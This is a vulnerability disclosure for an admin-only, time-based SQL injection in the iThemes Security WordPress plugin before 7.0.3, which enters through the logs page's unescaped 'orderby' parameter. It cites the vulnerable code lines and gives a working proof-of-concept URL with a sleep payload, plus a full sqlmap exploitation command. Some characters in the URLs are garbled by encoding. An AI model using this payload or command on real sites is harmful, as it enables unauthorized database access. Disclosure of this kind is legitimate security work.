The iThemes Security (better-wp-security) plugin before 7.0.3 for WordPress allows SQL Injection (by attackers with Admin privileges) via the logs page. Vulnerability description: iThemes Security appears to be vulnerable to time-based SQL-Injection. Parameter orderby is vulnerable because backend variable $sort_by_column is not escaped. Privileges required: Admin user. Technical details: File: better-wp-security/core/admin-pages/logs-list-table.php Line 271: if ( isset( $_GET[' orderby '], $_GET[‘order’] ) ) { Line 272: $ sort_by_column = $_GET[' orderby ']; File: better-wp-security/core/lib/log-util.php Line 168: $query .= ’ ORDER BY ’ . implode( ', ', $ sort_by_column ));
The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin: http://localhost/wordpress/wp-admin/admin.php?page=itsec-logs&filter;=malware&orderby;=remote_ip%2C(select*from(select(sleep(10)))a)ℴ=asc&paged;=0 Using SQLMAP: sqlmap -u ‘http://localhost/wp-admin/admin.php?page=itsec-logs&filter;=malware&orderby;=remote_ip*ℴ=asc&paged;=0’ --cookie “wordpress_b…; wordpress_logged_in_bbf…;” --string “WordPress” --dbms=MySQL --technique T --level 5 --risk 3